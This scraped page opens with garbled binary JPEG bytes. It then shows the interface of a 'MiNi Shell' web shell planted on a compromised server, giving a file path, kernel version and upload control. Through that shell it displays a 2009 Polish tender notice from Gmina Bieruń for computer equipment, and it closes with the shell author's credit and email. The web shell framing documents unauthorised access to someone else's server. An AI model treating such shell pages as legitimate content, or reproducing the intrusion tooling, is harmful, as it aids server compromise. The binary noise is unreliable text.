JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090724/251824-N-2009.html

<p class="kh_header"><b>Bieruń: Dostawa sprzętu komputerowego</b><br>
<b>Numer ogłoszenia: 251824 - 2009; data zamieszczenia: 24.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu komputerowego i drukarek na potrzeby Urzędu Miejskiego w Bieruniu, w niżej wskazanych  ilościach. 

Komputer - stanowisko robocze - 14 szt.

Monitor - 14 sztuk

Drukarka laserowa typ A - 3 szt.

Drukarka laserowa typ B - 3 sztuki

Drukarka laserowa kolor - 1 szt.

Szczegółowy zakres zamówienia zawarto w SIWZ.

Zamawiający nie przewiduje zawarcia umowy ramowej, aukcji elektronicznej, udzielenia zamówień uzupełniających  w rozumieniu ustawy Pzp .

Jeżeli w  SIWZ określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie gorszych parametrach niż wskazane w SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.23.21.10-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 1 200,00 zł ( słownie:  tysiąc dwieście złotych 00/100 ) musi być 
wniesione w terminie, który został podany w punkcie Terminy. 
Wadium wnoszone w pieniądzu  należy przelać na rachunek Zamawiającego 
w BS O/Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją: 
Wadium - nr sprawy: ZP- 3410 /  32   /09 Dostawa sprzętu komputerowego.
Wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium na rachunku Zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego w Bieruniu, nie później niż do godz. 12:00  w dniu otwarcia ofert. 
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)    w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy 
       z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 
       poz.1158 z późniejszymi zmianami).
W przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się o udzielenie nin. zamówienia, należy wskazać  wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.
Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                    z art. 24ust.2 pkt 4 ustawy, a jego oferta zostanie odrzucona.

2.	Zasady zwrotu wadium
Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy wraz                  z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
1) Zgodnie z art. 46 ust.1 ustawy, wadium zostanie zwrócone niezwłocznie, jeżeli:
a) upłynął termin związania ofertą,
b) zawarto umowę i wniesiono zabezpieczenie należytego wykonania tej umowy,
c) Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte 
lub upłynął termin do ich wnoszenia.
2) Z zastrzeżeniem ust.4a ustawy, Zamawiający zwraca niezwłocznie wadium na wniosek 
    Wykonawcy:
     a) który wycofał ofertę przed upływem terminu składania ofert;
     b) który został wykluczony  z postępowania;
     c) którego oferta została odrzucona.


3. Utrata wadium
Zgodnie z zastrzeżeniem ust.4a Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to                 z przyczyn nie leżących po jego stronie.
Zgodnie z art. 46 ust. 5 ustawy Zmawiający zatrzymuje wadium wraz z odsetkami, jeżeli  Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych     w ofercie;
2) nie wniósł zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
1)	spełniają wszystkie wymagania wynikające z  oświadczeń, których listę przedstawiono                 w punkcie Wymagane oświadczenia oraz inne wymagania formalne określone  SIWZ                       i ustawą;
      2)   w okresie ostatnich trzech lat przed dniem wszczęcia  postępowania, a jeśli okres prowadzenia 
działalności jest krótszy - to w tym okresie, wykonali z należytą starannością co najmniej jedną dostawę sprzętu komputerowego o wartości brutto minimum 50 000,00 PLN ;
      3) posiadają ubezpieczenie od odpowiedzialności cywilnej na kwotę min. 50 000,00PLN; 
      4)  posiadają środki finansowe w wysokości co najmniej 50 000,00 PLN lub posiadają
            zdolność kredytową w wysokości co najmniej 50 000,00 PLN;
      5) zapewnią gwarancję na oferowany sprzęt min.:
           a) zestawy komputerowe 36 m-cy  od daty  podpisania protokołu odbioru,
           b) drukarki 24 m-ce od daty  podpisania protokołu odbioru.

Ocena spełnienia warunków uczestnictwa w postępowaniu będzie dokonana wg zasady:     spełnia/ nie spełnia, na podstawie przedłożonych w ofercie dokumentów i oświadczeń w związku z wymaganiami określonymi w SIWZ i ustawie.     
 W przypadku wspólnego ubiegania się dwóch lub więcej  Wykonawców o udzielenie niniejszego   
  zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu   
  dokumenty może złożyć ten lub ci Wykonawców, którzy w imieniu wszystkich wykazywać będą  
  spełnianie  warunków.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia :
1.	Oświadczenie  z  art. 22  ust. 1 ustawy, że :
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada niezbędną wiedzę i doświadczenie oraz  dysponuje potencjałem technicznym              i osobami zdolnymi do wykonania zamówienia lub przedstawi  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlega wykluczeniu z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 ustawy.
       2.    Oświadczenie, że po zapoznaniu się z  SIWZ - akceptuje je bez zastrzeżeń.
3.	Oświadczenie, że będzie związany przedmiotową ofertą przez okres 30 dni od daty upływu   terminu składania ofert, a w przypadku wygrania przetargu zawrze umowę wg wzoru  dołączonego do SIWZ w ciągu 14 dni od daty otrzymania informacji o wyborze oferty.
4.    Oferta jest jawna w całości - części. Strony oferty od -   do     stanowią tajemnicę   
       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą 
       być ujawnione innym uczestnikom postępowania.
      5.     Oświadczenie podmiotów występujących wspólnie (konsorcjum, spółka cywilna) - w 
              przypadku ich  udziału w postępowaniu. 
      6.   Oświadczenie o wykonaniu zmówienia własnymi siłami /lub określeniu jaka część zamówienia  
            zostanie powierzona podwykonawcom.
      7.    Oświadczenie o udzielonej gwarancji.
      8.    Oświadczenie, że oferowany sprzęt jest fabrycznie nowy, wyprodukowany w 2009 r. 

Wzory oświadczeń  dołączone są do SIWZ. 
Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnioną (uprawnione) do zaciągania zobowiązań w imieniu wykonawcy, zgodnie                     z załączonym do oferty aktualnym wpisem do właściwych rejestrów (KRS) czy ewidencji działalności gospodarczej,   lub odpowiednimi pełnomocnictwami. Pełnomocnictwa muszą być załączone do oferty w formie oryginałów lub notarialnie poświadczonych kopii.


Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów  z dnia 19 maja 2006 roku  (Dz. U. Nr  87/2006 poz. 605 z późniejszymi zmianami) mogą być przedstawione w formie oryginału albo kserokopii poświadczonych za zgodność z oryginałem (zaleca się poświadczenie każdej zapisanej strony dokumentu) przez wykonawcę tzn. osobę (osoby) uprawnioną(e) do podpisania oferty:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
      2.   Wykaz wykonanych  z należytą starannością dostaw sprzętu komputerowego w okresie trzech 
             lat  przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy 
             - to  w tym okresie.    
           Należy wykazać co najmniej 1 dostawę zgodną z warunkami podanymi w pkt. VI. 2. 
	     Wykaz należy sporządzić wg wzoru tabeli stanowiącej załącznik do SIWZ.
      3.   Dokumenty ( np. referencje zamawiających) potwierdzające należytą staranność wykonania co 
            najmniej 1 dostawy sprzętu  z  podanych w wykazie dostaw, dla dopełnienia wymaganego 
             w pkt. VI.2 warunku.  
4.  Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym 
    Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych 
     lub zdolność kredytową Wykonawcy min. 50 000,00 PLN, wystawioną nie wcześniej niż 3 
           miesiące przed upływem terminu składania ofert .
      5. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest 
          ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę 
          min. 50 000,00 PLN

Uwaga:
Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt. 1,  Listy wymaganych dokumentów  przedstawia odpowiednio:
1)  pkt 1  - dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono 
     upadłości,
Dokument, o których mowa powyżej,  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa 
w punkcie 1 niniejszej uwagi.
Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 43-150 Bieruń, ul. Rynek 14 (Referat Zamówień Publicznych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2009 godzina 12:00, miejsce: Urząd Miejski 43-150 Bieruń, ul. Rynek 14  (Kancelaria - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com